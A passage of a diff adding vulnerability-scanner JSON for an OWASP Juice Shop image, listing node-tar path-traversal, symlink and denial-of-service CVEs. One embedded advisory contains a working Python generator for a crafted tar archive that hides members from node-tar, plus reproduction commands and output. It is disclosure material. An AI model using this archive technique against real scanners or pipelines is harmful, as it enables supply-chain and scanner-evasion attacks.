"ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.8", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b0e84f0f44e8cb4ee07bbe029ac2bb93baea2794a5b5007bbc18f4de3e952be1", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.10", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b5044493bd3fed69399a94a7bc6b79b9b1eca9ac98d6a5276d91cb8f60c175ed", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 2, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.11", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a8fe8524f5479c5bd44a4956f6b0c67b830a8f60b203063af6e69d1e7b630d25", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2024-28863", + "VendorIDs": [ + "GHSA-f5x3-32g6-xq36" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "6.2.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-28863", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b910d635ab51432b629a95b370ac5fbfc29394fe53116591c5569afee78fb923", + "Title": "node-tar: denial of service while parsing a tar file due to lack of folders depth validation", + "Description": "node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400", + "CWE-770" + ], + "VendorSeverity": { + "alma": 2, + "amazon": 2, + "azure": 2, + "cbl-mariner": 2, + "ghsa": 2, + "oracle-oval": 2, + "redhat": 2, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2024:6148", + "https://access.redhat.com/security/cve/CVE-2024-28863", + "https://bugzilla.redhat.com/2293200", + "https://bugzilla.redhat.com/2296417", + "https://bugzilla.redhat.com/show_bug.cgi?id=2293200", + "https://bugzilla.redhat.com/show_bug.cgi?id=2296417", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22020", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28863", + "https://errata.almalinux.org/8/ALSA-2024-6148.html", + "https://errata.rockylinux.org/RLSA-2024:6147", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7", + "https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7 (v6.2.1)", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36", + "https://linux.oracle.com/cve/CVE-2024-28863.html", + "https://linux.oracle.com/errata/ELSA-2024-6148.html", + "https://nvd.nist.gov/vuln/detail/CVE-2024-28863", + "https://security.netapp.com/advisory/ntap-20240524-0005", + "https://security.netapp.com/advisory/ntap-20240524-0005/", + "https://www.cve.org/CVERecord?id=CVE-2024-28863" + ], + "PublishedDate": "2024-03-21T23:15:10.91Z", + "LastModifiedDate": "2025-12-16T17:25:07.493Z" + }, + { + "VulnerabilityID": "CVE-2026-53655", + "VendorIDs": [ + "GHSA-vmf3-w455-68vh" + ], + "PkgID": "tar@4.4.19", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "InstalledVersion": "4.4.19", + "FixedVersion": "7.5.16", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-53655", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:765feadd70aedab728d17ef802c659a4e1e049319e778dcd89a1d4362bf354d8", + "Title": "node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)", + "Description": "### Summary\n\n`tar` (node-tar) applies a PAX extended header's `size=` record (and other PAX\noverrides) to the **next header entry of any type**, including intermediary\nmetadata headers such as a GNU long-name (`L`) or long-link (`K`) entry. Per\nPOSIX pax, a PAX extended header (`x`) describes the *next file entry*, not the\nintermediary extension headers that may sit between the `x` header and the file\nit annotates. Because node-tar lets the PAX `size` override the byte length of\nan intervening `L`/`K`/`x` header, an attacker can desynchronize node-tar's\nstream cursor relative to every other mainstream tar implementation\n(GNU tar, libarchive/bsdtar, Python `tarfile`, and the now-fixed `tar-rs` /\n`astral-tokio-tar`).\n\nThe result is a tar parser **interpretation differential** (CWE-436): a single\ncrafted archive yields a different set of members under node-tar than under the\nreference tar tools. An attacker can use this to hide a member from one parser\nwhile it is visible to another, which defeats security tooling whose scanner and\nextractor disagree on archive contents (e.g. a malware/secret scanner that lists\nentries with one library while a downstream step extracts with another). node-tar\nis one of the most widely deployed JavaScript tar libraries (it backs `npm`'s own\npackage-tarball handling and is a transitive dependency of a very large fraction\nof the npm ecosystem), so the blast radius for \"files that extract differently\ndepending on the tool\" is broad.\n\nThis is the same root cause and fix that was just addressed upstream in the Rust\ntar ecosystem (`tar-rs` / `astral-tokio-tar`); node-tar carries the equivalent\ndefect and has no equivalent guard.\n\n### Impact\n\n- CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as\n the prior tar \"smuggling\" advisories GHSA-j5gw-2vrg-8fgx and\n GHSA-fp55-jw48-c537).\n- A crafted archive can present one logical member list to a tool that lists or\n scans with node-tar and a different member list to GNU tar / libarchive /\n Python tarfile (and vice versa). This lets a malicious file be hidden from a\n scanner that uses a different parser than the eventual extractor, or hidden\n from node-tar-based inspection while still landing on disk via a system `tar`.\n- No authentication is required; the only precondition is that a victim parses\n an attacker-supplied tar with node-tar. Tar archives are routinely fetched\n from untrusted sources (package registries, user uploads, CI artifacts,\n container layers).\n- Severity: Medium. Impact is integrity-of-archive-interpretation, not direct\n RCE; it is a building block for supply-chain / scanner-evasion attacks rather\n than a standalone code-execution primitive.\n\n### Vulnerable code (file:line)\n\n`src/header.ts` (compiled to `dist/esm/header.js:49` and\n`dist/commonjs/header.js:85` in the published `tar@7.5.15`):\n\n```ts\n// Header.decode(buf, off, ex, gex)\nthis.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12)\n```\n\n`ex` is the currently-accumulated PAX **local** extended header and `gex` the\nPAX **global** header. The `size` override from `ex`/`gex` is applied\nunconditionally to whatever header is being decoded next — there is no check\nthat the header being decoded is a real *file* entry rather than an intermediary\nextension header.\n\n`src/parse.ts`, `[CONSUMEHEADER]` constructs the next header with the current\n`EX`/`GEX` applied:\n\n```ts\nconst header = new Header(chunk, position, this[EX], this[GEX])\n```\n\nand later branches on whether that header is a metadata entry. `this[EX]` is\ncleared only in the non-meta (real file) branch:\n\n```ts\nif (entry.meta) {\n // L / K / x / g metadata entries: this[EX] is left intact here\n if (entry.size \u003e this.maxMetaEntrySize) {\n entry.ignore = true\n this[STATE] = 'ignore'\n entry.resume()\n } else if (entry.size \u003e 0) {\n this[META] = ''\n entry.on('data', c =\u003e (this[META] += c))\n this[STATE] = 'meta'\n }\n} else {\n this[EX] = undefined // EX cleared only once a real file entry is reached\n}\n```\n\nWhen the stream is ordered `x (PAX, size=N) -\u003e L (GNU long-name) -\u003e file`, the\n`L` header is constructed with `this[EX]` still set, so its `size`/`remain`\nbecomes `N` instead of the `L` payload's true length. node-tar then consumes `N`\nbytes of \"metadata\" and resumes header parsing at the wrong offset, landing\nmid-stream. Every other mainstream parser applies the PAX `size` only to the\nfollowing *file* entry, so they stay synchronized.\n\nThe correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is\nto **not** apply PAX `size`/overrides when the entry being decoded is itself an\nextension header (`L` GNU long-name, `K` GNU long-link, `x` PAX local, `g` PAX\nglobal).\n\n### How input reaches the sink\n\n`tar.list()`, `tar.extract()`/`tar.x()`, and `tar.Parse`/`tar.Unpack` all route\nevery 512-byte header block through `Header.decode(...)` with the\ncurrently-accumulated `EX`/`GEX`. Any consumer that parses an attacker-supplied\narchive — `tar.list`, `tar.extract`, or piping into the streaming `Parser` —\nreaches the sink. No options need to be enabled; the default code path is\naffected.\n\n### Proof of concept\n\nArchive layout (all standard, GNU-tar-producible blocks):\n\n```\nblock 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body)\nblock 1 : x payload : the single PAX record \"...size=2048\\n\"\nblock 2 : L header (GNU long-name '././@LongLink'), real size = 13\nblock 3 : L payload : \"longname.txt\\0\" (the long name for the next file)\nblock 4 : file header 'file_a', size = 16\nblock 5 : file_a body (16 bytes, zero-padded to 512)\nblock 6 : file header 'file_b', size = 16\nblock 7 : file_b body (16 bytes, zero-padded to 512)\n```\n\nGenerator (`make_tar.py`, pure stdlib, no external deps):\n\n```python\ndef hdr(name, size, typeflag):\n h = bytearray(512); name = name[:100]; h[0:len(name)] = name\n h[100:108] = b'0000644\\0'; h[108:116] = b'0000000\\0'; h[116:124] = b'0000000\\0'\n h[124:136] = ('%011o\\0' % size).encode(); h[136:148] = b'00000000000\\0'\n h[156:157] = typeflag; h[257:263] = b'ustar\\0'; h[263:265] = b'00'\n h[148:156] = b' ' * 8\n cs = sum(h); h[148:156] = ('%06o\\0 ' % cs).encode()\n return bytes(h)\n\ndef pad(d):\n return d + b'\\0' * ((512 - len(d) % 512) % 512)\n\ndef pax_record(key, val): # length-prefixed PAX record \"LEN key=val\\n\"\n body = b' %s=%s\\n' % (key.encode(), str(val).encode()); n = len(body)\n while True:\n s = str(n).encode() + body\n if len(s) == n: break\n n = len(s)\n return s\n\npax = pax_record('size', 2048) # malicious: claim size=2048 for the \"next\" entry\nout = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax)\nout += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\\0')\nout += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body')\nout += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body')\nout += b'\\0' * 1024\nopen('pax-desync.tar', 'wb').write(out)\n```\n\nA negative-control archive is identical except the PAX record is\n`pax_record('comment', 'x')` (no `size=`), written to `pax-control.tar`.\n\n### End-to-end reproduction (against pinned version `tar@7.5.15`, latest release)\n\nInstall the published package into a clean project and parse both archives:\n\n```\n$ npm init -y \u003e/dev/null \u0026\u0026 npm install tar@7.5.15\n$ node -e \"console.log(require('tar/package.json').version)\"\n7.5.15\n$ grep -n \"ex?.size ?? gex?.size\" node_modules/tar/dist/esm/header.js\n49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12);\n```\n\n`e2e.mjs`:\n\n```js\nimport * as tar from 'tar'\nasync function listEntries(f){\n const got=[], warns=[]\n await tar.list({ file:f, onReadEntry:e=\u003e{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() },\n onwarn:(code,_msg)=\u003ewarns.push(code) })\n return { got, warns }\n}\nconst mal = await listEntries('pax-desync.tar')\nconsole.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns))\nconst ctl = await listEntries('pax-control.tar')\nconsole.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns))\n```\n\nVerbatim output:\n\n```\n=== Deployed-consumer E2E: npm tar@7.5.15 (latest release) ===\n\n[MALICIOUS] archive = x(PAX size=2048) -\u003e L(GNU longname \"longname.txt\") -\u003e file_a(16B) -\u003e file_b(16B)\n tar.list() entries : []\n tar.list() warnings: [\"TAR_ENTRY_INVALID\"]\n\n[NEGATIVE CONTROL] same archive, PAX record is \"comment=x\" (no size= override)\n tar.list() entries : [{\"path\":\"longname.txt\",\"size\":16,\"type\":\"File\"},{\"path\":\"file_b\",\"size\":16,\"type\":\"File\"}]\n tar.list() warnings: []\n```\n\nReference parsers on the **same** `pax-desync.tar`:\n\n```\n$ tar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar\n\n$ bsdtar tvf pax-desync.tar\n-rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive\n\n$ python3 -c \"import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])\"\n['longname.txt'] # Python tarfile\n```\n\nInterpretation differential: GNU tar, libarchive (bsdtar), and Python `tarfile`\nall extract the member `longname.txt` from `pax-desync.tar`, whereas node-tar\n`7.5.15` desynchronizes, raises `TAR_ENTRY_INVALID` (checksum failure from\nlanding mid-stream), and reports **zero** members. The negative control proves\nthe divergence is caused solely by the PAX `size=` override being applied to the\nintermediary `L` header — when the same archive carries a PAX record without\n`size=`, node-tar parses it identically to the reference tools\n(`longname.txt`, `file_b`).\n\n### Suggested fix\n\nWhen decoding a header, do not apply PAX `size` (or other PAX overrides) if the\nheader being decoded is itself an extension header. Concretely, in\n`src/parse.ts` clear/ignore `this[EX]` (and `this[GEX]` for `size`) when the\nheader's type is `ExtendedHeader`, `GlobalExtendedHeader`, `NextFileHasLongPath`\n(GNU `L`), or `NextFileHasLongLinkpath` (GNU `K`); equivalently, in\n`Header.decode`, gate the `ex?.size ?? gex?.size` override on the decoded type\nnot being one of those extension types. This mirrors the upstream Rust fix,\nwhich guards `pax_size` with\n`is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions`.\n\nA fix PR is being prepared against a private fork and will be linked here.\n\n### Fix PR\n\nTo be linked from a private fork of the repository (the fix will not be pushed\nto any public fork or to upstream during embargo).\n\n### Credits\n\nReported by tonghuaroot.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.9 + } + }, + "References": [ + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh" + ] + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:47ac55c490d1b67b0a9ee271e04011b7449bd1d17212de98581a9a42d6d4fe35", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "alma": 3, + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:18480", + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://bugzilla.redhat.com/2425946", + "https://bugzilla.redhat.com/2430538", + "https://bugzilla.redhat.com/2431036", + "https://bugzilla.redhat.com/2431740", + "https://bugzilla.redhat.com/2433645", + "https://bugzilla.redhat.com/show_bug.cgi?id=2425946", + "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431740", + "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15284", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", + "https://errata.almalinux.org/10/ALSA-2026-18480.html", + "https://errata.rockylinux.org/RLSA-2026:18868", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgPath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a4347740eaefe081a355c3e31842ba8b0883566f518079c0c23ea60a1f077309", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal 